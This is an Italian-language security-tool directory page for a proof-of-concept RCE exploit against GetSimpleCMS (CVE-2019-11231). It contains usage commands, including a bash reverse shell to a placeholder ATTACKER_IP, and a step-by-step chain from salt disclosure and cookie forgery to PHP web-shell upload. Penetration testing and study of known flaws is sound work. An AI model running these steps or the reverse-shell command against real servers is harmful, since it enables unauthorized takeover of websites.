Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-11231-PoC — CVE-2019-11231 PoC | Kitploit
Strumenti/GitHubGitHub/akincibor/cve-2019-11231-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubakincibor/cve-2019-11231-poc

CVE-2019-11231-PoC

CVE-2019-11231 PoC

Vedi Repository
18 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit RCE per GetSimpleCMS CVE-2019-11231

Python CVE

Exploit RCE non autenticato per GetSimpleCMS ≤ 3.3.15

Vulnerabilità

GetSimpleCMS espone pubblicamente file sensibili (/data/other/authorization.xml, /data/users/) consentendo agli attaccanti di:

  1. Divulgare chiavi API e nomi utente
  2. Forgiare cookie di autenticazione
  3. Ottenere token CSRF
  4. Caricare ed eseguire codice PHP arbitrario

Punteggio CVSS: 9.8 (Critico)

Utilizzo

root@kitploit:~
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

Come Funziona

  1. Enumera versione → GET /admin/
  2. Divulga salt → GET /data/other/authorization.xml
  3. Ottieni nome utente → GET /data/users/
  4. Forgia cookie → SHA1(username + salt)
  5. Ottieni nonce → GET /admin/theme-edit.php
  6. Carica shell → POST /admin/theme-edit.php
  7. Esegui comandi → GET /theme/shell.php?cmd=...

File

  • exploit.py - Script principale dell'exploit
  • requirements.txt - Dipendenze (requests, beautifulsoup4)

Dichiarazione di non responsabilità

⚠️ Solo a scopo educativo. Testa solo su sistemi di tua proprietà o per i quali hai autorizzazione.

Riferimenti

  • https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231
Scarica lo strumento